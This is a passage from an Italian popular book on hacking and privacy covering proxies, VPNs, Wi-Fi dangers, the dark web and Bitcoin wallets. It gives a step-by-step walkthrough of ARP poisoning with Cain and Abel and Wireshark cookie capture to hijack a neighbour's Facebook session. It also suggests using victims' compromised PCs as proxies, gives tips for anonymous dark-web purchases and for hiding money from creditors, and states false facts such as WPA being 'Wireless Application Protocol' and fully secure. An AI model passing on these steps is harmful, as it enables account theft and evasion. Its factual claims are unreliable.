come abbiamo visto in realtà non è così, l’unica cosa che voglio aggiungere
prima di chiudere e passare ad altro è che lo sponsor che supporta più di tutti
il progetto è una società del governo USA, funziona come i politici, per
vedere chi favoriranno, basta vedere chi li sponsorizza.

Dopo Tor, possiamo passare ai proxy che sono un metodo di anonimato

che ho utilizzato per anni, quando non era ancora ben sdoganata l'idea dei
VPN, i proxy era l'unica cosa che ti rendeva anonimo, per fare un esempio di
come funziona un proxy, esso funge da mediatore tra te che richiedi un file
per il download, e il server che ti alloca la banda necessaria per scaricarlo, in
modo da camuffarti.

La preoccupazione che ha portato vari hacker a non utilizzarli più come

fonte primaria di anonimato è la loro tendenza a registrare dati sensibili
qualora qualcuno si collegasse a quel determinato proxy per utilizzarlo, ma ci
sono delle eccezioni a questo che vedremo tra un po’, esistono 3 tipi di proxy
attualmente:

Proxy Trasparenti: Non coprono assolutamente le tue tracce, l'unico

vantaggio che hanno questo tipo di proxy, è che sono più veloci degli altri.

Proxy Anonimo: Questo invece come si evince dal nome, nasconde il tuo
indirizzo ip, l'unico problema è che rende noto al server che stai utilizzando
un proxy, e questo può causare tutta una serie di problemi, come
l'impossibilità di caricare alcune pagine, o l'amministratore del server può
semplicemente bandire l'ip.

Proxy D'Élite: Quest'ultimo invece, nasconde il tuo indirizzo ip ed è

impossibile per chi guarda capire che si sta utilizzando un proxy, è il migliore
tra quelli che ho elencato ma data la sua elevata protezione, è più lento.

È anche importante scegliere il paese del proxy, se scegliamo un proxy

italiano o americano, le autorità competenti non avranno problemi a
smascherare il vero IP dietro al proxy, ma se invece utilizziamo un proxy
nord coreano, cinese o panamense, le probabilità di essere scoperti scendono
drasticamente.

Come ultimo accorgimento, restringendo le opzioni a quelle più

utilizzate, possiamo trovare proxy SOCKS e proxy HTTP, come differenza
fondamentale possiamo dire che i proxy HTTP non posseggono alcun tipo di
firewall, sono semplicemente dei proxy web-based mentre i socks sono delle
vere e proprie macchine addette solo a funzionare come proxy.

Il miglior modo per rimanere anonimi utilizzando i proxy è di

programmarsi da sé il proprio socket server, ne esistono vari gratuiti ma tutti
possono essere identificabili da chi è competente, mentre se il socks è
programmato da zero, l'operazione diventa impossibile.

Per rendere ancora più impenetrabile le proprie difese, l'hacker può

utilizzare i pc delle vittime a cui ha accesso per trasformarli in socket server,
in modo che può nascondere il suo ip sotto decine di server socks, questo a
mio avviso è il metodo più sicuro che attualmente è possibile utilizzare.

Come ultimo metodo, possiamo citare quello più utilizzato, ossia i

VPN, sono facili da utilizzare e abbastanza anonimi da essere utilizzati da
hacker di tutto il mondo per compiere attacchi di scala minori, ma non devi
essere un hacker per usufruire dei benefici di un VPN, spesso mi trovo a
parlare con persone che sono convinte che se usi un VPN, automaticamente
hai qualcosa da nascondere e quindi non sei "pulito", ecco 4 miti che devono
essere sfatati:

1. Tutti i VPN sono uguali.

Assolutamente no, ogni provider ha un diverso criptaggio per mantenere i

propri utenti al sicuro da occhi indiscreti, alcuni utilizzano protocolli diversi,
come PPTP o OpenVPN, questo elencato per ultimo è la miglior scelta.

Alcuni provider si concentrano sulla qualità della connessione, mentre

altri sull'anonimato, alcuni mantengono dei log sulla tua connessione, mentre
altri specificano chiaramente che non registrano alcun tipo di log, per ognuno
c'è il VPN che calza meglio alle proprie esigenze.

2. Un VPN gratuito va più che bene.

Quello che apparentemente può sembrare un servizio gratuito, in realtà non lo

è quasi mai, molto spesso questo tipo di servizi per sopravvivere e pagare i
server dove gli utenti navigano gratuitamente, vendono letteralmente le tue
informazioni a potenziali acquirenti, come advertisers e altri seller di prodotti
per la sicurezza e anonimato.

Spesso questo tipo di VPN sono lenti e tracciano ogni piccola azione
che fai, quindi se ti interessa almeno un minimo della tua privacy, ti
sconsiglio caldamente di utilizzarli.

3. Un VPN mi rallenta la connessione.

Dato che il VPN passa i dati della tua connessione tramite un server si può
erroneamente pensare che rallenti la connessione, in realtà non è sempre così.

Mettiamo che il sito che stiamo visitando abbia un server ad

Amsterdam, la nostra connessione normale parte dall’Italia, quindi i nostri
dati devono viaggiare un bel po’ prima di arrivare a destinazione, mentre
utilizzando un VPN che rimbalza i nostri dati in Belgio per esempio, la
connessione apparirà più scattante, il che è particolarmente indicato per chi
guarda film in streaming o gioca online.

4. Non mi server un VPN se non faccio niente di illegale.

Anche qui non sono d’accordo, i VPN non sono nati per permettere alle
persone di compiere azioni illegali e farla franca, ma bensì di bypassare
restrizioni geografiche e poter accedere a siti web che nel tuo paese non sono
accessibili, come per esempio qualche mese fa, Netflix non era disponibile in
Italia e chi voleva usufruire del servizio doveva munirsi di un VPN.

Inoltre protegge il tuo ip, da attacchi remoti e locali, nessuno può

collegarsi alla tua rete WIFI e sniffare il tuo traffico, in quanto è tutto
completamente criptato.

Il servizio migliore che uso tutt'ora è che raccomando è:

https://ita.privateinternetaccess.com

Mettono la sicurezza al primo posto, non mantengono log di alcun

genere ed i server sono molto veloci, non sono affiliato o altro con questo
sito, lo consiglio soltanto perché credo possa essere una buona risorsa per te
che leggi.
 Capitolo 13: Pericoli Delle Reti Wi-Fi Che Non Ti
Aspetti

Spesso non lo realizziamo, ma quando ci colleghiamo ad una rete Wi-Fi

pubblica o lasciamo collegare qualcuno alla nostra rete personale, stiamo
mettendo in pericolo le nostre informazioni e password personali.

Ma prima vediamo come incrementare il livello di sicurezza della nostra

rete Wi-Fi domestica. Prima di tutto bisogna evitare di utilizzare una chiave
WEP (Wired Equivalent Privacy) in quando non è considerata più sicura da
molto tempo, sono state scoperte varie vulnerabilità che la rendono molto
insicura e facile da crackare, non coprirò questo argomento in quanto ci sono
centinaia di guide ormai online essendo un argomento abbastanza vecchio.

Utilizzando invece una chiave WPA (Wireless Application Protocol)

rendiamo la nostra rete sicura al 100%, dato che l’unico tipo di attacco che
può effettuare l’hacker verso la nostra rete è il brute force, con una password
sufficientemente lunga e complessa, può impiegarci anni a scoprirla, per
questo infatti molti malintenzionati non ci provano nemmeno.

Ma se diamo la password a qualche vicino o persona che non ha buone

intenzioni, possono rubare i cookie di Facebook, Youtube e altri servizi
usandoli per avere accesso non autorizzato ai tuoi account.

Ma vediamo meglio, come potrebbe fare un hacker o un vicino con

conoscenze informatiche ad avere accesso ai nostri account solamente
collegandosi sulla nostra rete WI-FI.

Per prima cosa ha bisogno dei seguenti strumenti:

- Cain And Abel = oxid.it/downloads/ca_setup.exe – Attenzione: Il tuo

Antivirus probabilmente lo identificherà come un virus, ma non lo è.
- WireShark = wireshark.org/download.html
- Un Cookie Manager per il tuo browser

Cain And Abel è un programma abbastanza datato che racchiude diversi

strumenti utili, uno degli utilizzi più famosi è la capacità di crackare diversi
tipi di password, ma per questo metodo, l’hacker lo utilizzerà per identificare
gli indirizzi IP attivi della rete a cui è connesso.

Per prima cosa è necessario aprire il programma Cain, poi cliccare il

tasto “sniffer”:

Ora dobbiamo identificare tutti gli host presenti sulla nostra rete locale,
per fare questo si preme la freccia blue e selezionare “All hosts in my subnet”
Una volta che ha acquisito gli ip collegati alla rete, può identificare i
vari computer collegati alla rete cliccando “Resolve HostName” sull’ip,
il prossimo passo è quello di lanciare un APR Posioning, verso uno
specifico computer o vari, prima di cliccare ok, bisogna aprire
WireShark.
 Aperto WireShark, dobbiamo impostare questo comando nella tabella
filter “http.cookie”, appena i cookie sono raccolti, è possibile interrompere il
processo:

Questa è la parte più complessa dove l’hacker deve identificare il

pacchetto giusto dove sono contenuti i cookie.

Prima di tutto si clicca su “Hypertext Transfer Protocol” per analizzare i

dati del pacchetto e il cookie, in questo caso quello di Facebook, ha spesso la
parola [truncated] avanti, meglio copiare tutto il contenuto in un file di testo
dove si può vedere meglio, estratto il cookie dovrebbe apparire più o meno
così:

user=25425420;
pass=14254520;
id=205001;
 Una volta recuperate questi dati, l’Hacker deve aprire lo strumento per
gestire I cookie, sostituire i dati suoi a quelli della vittima e ricaricare la
pagina, se tutto è riuscito, ora l’Hacker starà scrutando Facebook in cerca di
informazioni sensibili.

Ovviamente Facebook non è l’unica password che può sniffare, è

possibile sniffare anche password vere e proprie cifrate, spesso in MD5 che
l’Hacker può cracckare utilizzando un Bruteforce o utilizzando le rainbow
table, che non sono altro che grandi dizionari Hash pre-calcolati, ma in fin dei
conti si tratta solo di un dizionario di parole, ma più veloce.

Vengono utilizzati oltre i programmi, anche dei servizi online per

brutare le password sniffate, tra cui:

• cloudcracker.com
• crackstation.net

Ho incluso questo metodo in questa sezione perché ne sono stato colpito

personalmente da una persona che entrata nella mia rete Wi-Fi sfruttando la
mia fiducia, ha sniffato tutte le mie conversazioni e password per 2 giorni,
quindi mi raccomando fai sempre attenzione, se usi un servizio di
messaggistica istantanea, assicurati che utilizzi un sistema di criptaggio in
entrata e in uscita.
 Capitolo 14: DeepWeb, DarkNet e Bitcoin

Questo è un argomento controverso da affrontare, perché quando le persone

parlano di deep web, credono che sia una cosa brutta da cui stare alla larga,
mentre altri non vedono l’ora di entrare per sporcarsi un po’ le mani, in realtà
tutti usiamo già il deep web, ogni giorno delle nostre vite, senza ricorrere a
programmi come Tor o altri, di fatto questa parte del web, non è altro che
tutte le pagine che non sono linkate da un motore di ricerca o che non hanno
libero accesso.

Mi sono sentito di fare questa distinzione, perché ogni volta che si parla
di deep web, c’è sempre questo velo di ignoranza dato dalla pesante
disinformazione presente in rete, di solito le immagini che ci sono online,
descrivono il deep web in questo modo:

In realtà non è così, l’immagine che dovrebbe essere propagata somiglia

più a questa
 Come puoi vedere molti fanno confusione, quando parlano di deep web,
si riferiscono in realtà al dark web, fa parte del deep web tutto quello che non
è indicizzato e che non si può raggiungere senza conoscere l’indirizzo, per
esempio se acquisto delle telecamere remote da mettere in casa, io
proprietario potrò collegarmi alla telecamera tramite il mio indirizzo ip che
solo io conosco, questo è abbastanza per considerare la mia telecamera parte
del deep web.

Come anche un semplice video su Youtube, se imposto la privacy su

privato automaticamente diventa parte del deep web in quanto è impossibile
guardare il video senza che il proprietario della risorsa ti manda l’indirizzo.

C’è più internet in quello che non vediamo che in quello che vediamo,
infatti la portata del deep web si aggira intorno al 95% di tutti i contenuti
internet presenti online, oltre 7.5 petabytes di informazioni nascoste, mentre
il dark web comprende solamente lo 0.03% di tutte le risorse internet che
ammontano ad un misero 20 terabytes di informazioni.

Anche se 0.03% può sembrare davvero poco per il dark web, basta
pensare che un Marketplace di droghe illegali “Silk Road” ha fatturato in 2
anni più di 1 bilione di euro, è un risultato impressionante se calcoliamo la
quantità di persone che accede al dark web ed il mercato di nicchia.

Quando il dark web fu creato, ossia nel 2004, io e i miei compagni di

avventura ci munimmo di una delle prime versioni pubbliche di Tor ed
andammo ad esplorare, creammo un nostro sito web .onion come fecero altri
gruppi di hacker con il quale avevamo contatti, e non facevamo altro che
guardare giorno per giorno il numero di siti crescere sempre di più,
inizialmente non c’era niente di particolarmente macabro, ma dopo qualche
anno le cose sono degenerate come non mi sarei mai aspettato.

Iniziarono a spuntare fuori veri e propri mercati dove era possibile

acquistare droghe di qualsiasi genere, servizi di hitman promossi da ex
militari, siti con delle misure di sicurezza così elevate da chiedermi cosa ci
fosse da nascondere dietro quegli strati infiniti di criptaggio, siti di sette
religiose con immagini discutibili, pornografia illegale, hackers su
commissione che promettono di rovinare la vita digitale di qualcuno a tua
scelta e tanto, ma tanto ancora, anche oggi è ancora tutto lì, servizi diversi e
persone diverse, ma i contenuti sono sempre gli stessi.

Con la consapevolezza di adesso, mi rendo conto che la maggior parte

di questi siti e servizi non sono altro che specchietti per le allodole messi in
piedi da autorità come l’FBI per catturare in anticipo chi ha intenzione di
commettere un crimine, come il servizio di hitman, non esiste niente del
genere, tutte cose curiose da raccontare ma che non trovano alcun riscontro
nella realtà.

Se hai intenzione di visitare il dark web in sicurezza, ci sono alcune

precauzioni che dovresti prendere onde evitare spiacevoli inconvenienti, per
accedere al dark web è necessario utilizzare Tor, già abbiamo visto come
funziona e le sue vulnerabilità, non è un sistema perfetto ma questo ci passa il
convento, esistono altri software simili ma meglio rimanere su Tor,
sconsiglio di utilizzarlo con Windows, se si vuole il massimo della
protezione, è bene scaricare TAILS, una distro di Linux dove di default tutto
il traffico generato passa tramite la rete Tor.

Ovviamente mai utilizzare dati personali veri se hai intenzione di

registrarti ad un forum, se invece hai intenzione di acquistare qualcosa, è
bene collegarsi ad un Wi-Fi pubblico, utilizzare un computer “usa e getta”
solo se sei paranoico, ovviamente pagare in Bitcoin e ordinare quantitativi
bassi di qualsiasi cosa tu stia acquistando.

Voglio specificare che non è detto che sul dark web tutto quello che si
vende o compra debba essere illegale, ma è sempre meglio tutelarsi e
rimanere il più anonimi possibile per evitare problemi in futuro.

Sono sicuro che se sei appassionato di informatica, avrai sentito o

conoscerai i Bitcoin, nel 2010 ci fu un bum nel dark web, tutti li utilizzavano
per acquistare e scambiare di tutto, nessuno li conosceva ancora bene ma il
fatto che fossero anonimi convinse tutti che quella era la strada da percorrere,
ricordo ancora che quasi tutti gli hacker che conoscevo, non facevano altro
che infettare persone per utilizzarle come generatori di Bitcoin, e all’epoca
funzionava alla grande dato che la difficoltà nel minarli era molto bassa, tutti
accumulammo un numero considerevole di Bitcoin e scambiavamo exploit,
vulnerabilità non rilasciate e altro, ci tengo a precisare che allora, 1 BTC era
equivalente ad 1 USD.

Andando avanti nel tempo, per la precisione nel 2013, avevo ancora un
portafoglio di Bitcoin, non li utilizzavo più dato che ormai ero
completamente fuori dal giro, non sapevo davvero che uso farne finché di
punto in bianco il 30 novembre ricevo una telefonata, è il mio ex compagno
del team, che mi chiese se avessi ancora i miei Bitcoin, io gli dissi di sì,
quindi lui mi consigliò di controllarne il valore, quando lo vidi mi prese un
colpo, 1 BTC era arrivato a valere più di 1000 USD, fu così che mi interessai
di nuovo a questo tipo i tecnologia e iniziai studiarne meglio il
funzionamento, l’anonimato e alcuni metodi per proteggerli.

I Bitcoin così come altre famose currency digitali hanno la fama di

essere decentralizzate, ossia non solo legate ad una banca centrare che può
semplicemente “stamparne” altri, ma devono essere minati attraverso la
risoluzione di problemi matematici su uno o più nodi, ma la verità è che i
bitcoin non sono totalmente decentralizzati, vediamo perché.

Le email sono decentralizzate, ma quando le riceviamo tutte nella nostra

casella di posta, diventano centralizzate, stessa cosa per i Bitcoin, dal
momento che li riceviamo nel nostro portafoglio, diventa una valuta
centralizzata in quanto purtroppo attualmente non esiste un modo per rendere
la valuta completamente decentralizzata, ma non è detto che non possa
avvenire in futuro.

Per tenere al sicuro il nostro portafoglio ci sono vari sistemi che

possiamo adottare, il metodo più comune è quello di tenere o installare il
proprio portafoglio su un dispositivo locale, ed è così che ho iniziato, ma
dopo un po’ mi sono reso conto di alcune terribili minacce che potevano
letteralmente succedere in qualsiasi momento.

Essendo un dispositivo locale, tutti i Bitcoin che possediamo sono

contenuti all’interno, per Bitcoin alla fine intendiamo la chiave segreta che ci
serve per accedere ai nostri Bitcoin sul network, il problema con questo
metodo che pur essendo conveniente, perché è possibile spendere i propri
Bitcoin in qualsiasi momento, il compromesso fatto con la sicurezza è troppo
grande, perché alla fine è come portare tutti i soldi dello stipendio nel proprio
portafoglio quando si va a fare la spesa, se il device dovesse essere hackerato,
possiamo dire addio ai nostri Bitcoin, stessa cosa se lo perdiamo casualmente.
 Come secondo metodo molto utilizzato dalle persone, troviamo i
portafogli online, ossia servizi cloud based che mettono a disposizione il tuo
Bitcoin wallet su qualsiasi dispositivo 24/7 senza interruzioni, ma come detto
prima se propendiamo troppo verso il confort, automaticamente ci sarà uno
scompenso nella sicurezza, quando mettiamo in mano i nostri Bitcoin a
servizi come questo, se dovessero essere hackerati, come già è successo ad
alcuni provider, i nostri Bitcoin finiranno per ingrassare le tasche di un
hacker, e questo sicuramente non lo vogliamo, vediamo il metodo che uso io
tutt’ora.

Dato che tutti vogliamo un equilibrio tra confort e sicurezza, questo

metodo richiede il lavoro sincronizzato di entrambe le parti, come base
avremo un portafoglio online ed uno offline, ognuno con una chiave segreta
diversa, quello offline fungerà da banca principale, mentre quello online verrà
utilizzato come carta di credito prepagata, prima di tutto vediamo come
impostare la parte offline.

La nostra componente online sarà un semplice Bitcoin wallet su un

pezzo di carta, niente di complicato si ritorna alle origini, il servizio che ho
utilizzato per generarlo è bitcoinpaperwallet.com, mentre questa è
un’alternativa fai da te “bitaddress.org”. Non c’è niente di più sicuro che puoi
fare per tenere al sicuro i tuoi Bitcoin principali, qui puoi tenerli in un luogo
sicuro senza la paura di perdere il tuo codice segreto o essere hackerato.

Ovviamente ogni volta che propongo questo approccio alle persone, mi

chiedono visto che è un semplice foglio, come è possibile spendere i Bitcoin,
ed è qui che entra in gioco la componente online.
La nostra carta prepagata sarà un secondo conto Bitcoin con una chiave
segreta completamente diversa, che sia cloud o oppure un comune portafoglio
non ha importanza, ogni volta che vogliamo passare una manciata di Bitcoin
sul nostro portafoglio offline dall’online, possiamo utilizzare un portafoglio
cloud o uno fisico installato sul nostro pc e con il comando “Sweep” o
“import” passare quanti Bitcoin preferiamo, le chiavi non vengono salvate
quindi non c’è alcun rischio per la sicurezza.

Viceversa se abbiamo troppi Bitcoin sul nostro portafoglio online,

possiamo inviarli al nostro portafoglio offline anche se in quel momento
siamo offline, la transizione andrà in coda e verrà completata quando il
dispositivo si ricollegherà online.

Il diagramma qui sotto mostra come dovrebbe funzionare il sistema.

Come portafoglio cloud ti consiglio Blockchain.info, mentre come

portafoglio fisico electrum, ho scelto questi due perché hanno le funzionalità
necessarie per effettuare lo scambio descritto sopra.

E questo è tutto per quanto riguarda il lato sicurezza, prima di chiudere

vorrei spendere due parole sulla questione anonimato.

Tutti ormai sanno per certo che i Bitcoin rappresentano un modo

anonimo per acquistare beni e servizi, ma se in realtà non fosse proprio così?

L’algoritmo utilizzato dai Bitcoin è lo SHA-256, questo stesso

algoritmo è stato creato dalla National Security Agency (NSA), ci sono stati
vari scandali sulle intercettazioni che li riguardano e questo è abbastanza per
far scaturire delle teorie sul reale anonimato dei Bitcoin, dato che hanno
creato l’algoritmo, probabilmente posseggono gli strumenti necessari per
distruggerlo, ma queste sono solo supposizioni, vediamo il lato più tangibile
della cosa.

L’anonimato è la base della privacy, se mi trovassi con una persona e

dovessi spiegargli in modo semplice cosa significa, probabilmente mi
verrebbe da dire, persona senza nome.

Se ci ragioniamo su, i Bitcoin non sono completamente anonimi in

quanto ogni persona che crea un portafoglio, viene collegato ad un hash
identificativo, un po' come quando qualcuno si crea un nome utente su un
forum, non è possibile identificare la persona dal nome utente ma
quest’ultima ha un nome, quindi non può essere definita anonima, mentre su
4chan una famosa board di internet, è possibile postare rimanendo
completamente anonimi, senza specificare niente.

Credo che i Bitcoin non offrano un completo anonimato, ma più che

altro una pseudo anonimità, in quanto alla fine è possibile stabilire un legame
con più indirizzi derivanti dalla stessa persona, quando facciamo un
pagamento, spesso il proprietario del sito chiede i nostri dati anagrafici, o se
prima o poi i negozi accetteranno pagamenti in Bitcoin, dovremmo mostrare
la nostra faccia per pagare, la questione deve essere un po' rivista, ma
comunque è abbastanza sicuro e irrintracciabile per pagare con sicurezza
qualsiasi cosa si voglia comprare, oppure per nascondere il proprio capitale
dai creditori, l’immaginazione e la moralità della persona che li usa, sono
l’unico limite.
 Parole Finali

Siamo giunti alla fine, in questo libro ho voluto portarti dietro le quinte e farti
scoprire tutti i trucchi che gli hacker usano OGGI per entrare nel tuo
computer e come puoi appunto difenderti in modo efficace utilizzando le
strategie e le conoscenze possedute da tutte le aziende che hanno a cuore la
sicurezza dei loro dati.

Voglio dirti che un programma come l’antivirus deve essere un aiuto ad

evitare le infezioni, ma non devi farci completo affidamento, l’anello debole
che permette agli Hacker di impossessarsi di informazioni preziose spesso è
l’uomo, tu che hai scelto di educare te stesso su questo argomento sei
diventato più forte, ma ormai lo avrai già capito.

Chi non leggerà questo libro, quando il commercialista gli invierà il

prossimo modello di pagamento da stampare, in formato pdf, probabilmente
non ci penserà due volte ad aprirlo e subire una violazione, perché di questo
si tratta.

Tu, non potrai più essere raggirato così, ora sai che niente è come
sembra e che gli antivirus non possono proteggerti, ogni volta che starai per
aprire un file, fermati a riflettere prima a cosa potrebbe essere, anche se non
sembra nulla di pericoloso.

Se vuoi reperire i programmi citati nel libro per testare la sicurezza del
tuo sistema o azienda simulando un attacco, devi sapere che alcune delle
risorse citate sono a pagamento, sconsiglio sempre di utilizzare per i tuoi
acquisti carta di credito o conto Paypal in quanto sono tracciabili, utilizza i
Bitcoin per fare questo tipo di acquisti.

Spero che il libro ti sia piaciuto, è stato molto piacevole per me

scriverlo, mi ha dato modo di rientrare in quel mondo come spettatore,
ricontattare qualche vecchio amico e aggiornarmi sulle ultime tattiche
utilizzate per entrare nei computer, sarà un trampolino di lancio per creare un
corso di formazione sulla sicurezza informatica approfondito che sia davvero
utile? Forse.

Mi raccomando, stai in guardia e tieni sempre gli occhi aperti, il

pericolo, potrebbe essere dietro l’angolo.

Grazie e Buona Vita

Ps: Se questo libro ti è piaciuto e senti di aver imparato qualcosa ti

andrebbe di lasciare una tua opinione su Amazon? Facendolo mi aiuteresti a
salire in classifica e rendere visibile questo libro a chi ne ha bisogno.
 SULL’AUTORE

Entrato nel mondo dell’hacking a soli 14 anni, Brian ha scoperto numerose

vulnerabilità nei sistemi più famosi e utilizzati del web, adesso 14 anni dopo
la sua missione è quella di formare sulla sicurezza aziende, professionisti e
amatori.